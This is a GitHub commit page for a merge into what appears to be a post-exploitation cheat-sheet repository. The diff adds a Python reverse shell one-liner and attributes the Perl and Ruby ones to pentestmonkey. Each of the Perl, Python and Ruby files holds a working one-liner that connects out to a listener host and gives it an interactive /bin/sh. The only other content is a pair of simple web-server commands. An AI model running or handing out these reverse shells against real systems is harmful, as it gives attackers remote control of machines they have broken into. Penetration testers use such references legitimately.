Skip to content

Commit 31ae408

Browse files
committed
Merge pull request #66 from jakxx/master
Added attribution and python reverse shell
2 parents f8d3762 + b89fcd6 commit 31ae408

File tree

3 files changed

+6
-3
lines changed

3 files changed

+6
-3
lines changed

scripting/perl.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -1,5 +1,5 @@
11
# Perl Commands and Scripts for Post Exploitation
22

3-
**Perl Reverse Shell**
3+
**Perl reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
44

55
```perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'```

scripting/python.md

+4-1
Original file line numberDiff line numberDiff line change
@@ -3,8 +3,11 @@
33
One liners
44
-----------
55

6-
76
**Start a web server that serves the local files on port 8000, single threaded**
87
```python
98
python -m SimpleHTTPServer 8000
109
```
10+
11+
**Python reverse shell from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
12+
13+
```python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'```

scripting/ruby.md

+1-1
Original file line numberDiff line numberDiff line change
@@ -7,6 +7,6 @@ One liners
77

88
```ruby -run -e httpd -- -p 8001 .```
99

10-
**Reverse /bin/sh shell on port 443**
10+
**Reverse /bin/sh shell on port 443 from [pentestmonkey.net](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)**
1111

1212
```ruby -rsocket -e'f=TCPSocket.open("192.168.2.5",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'```

0 commit comments

Comments
 (0)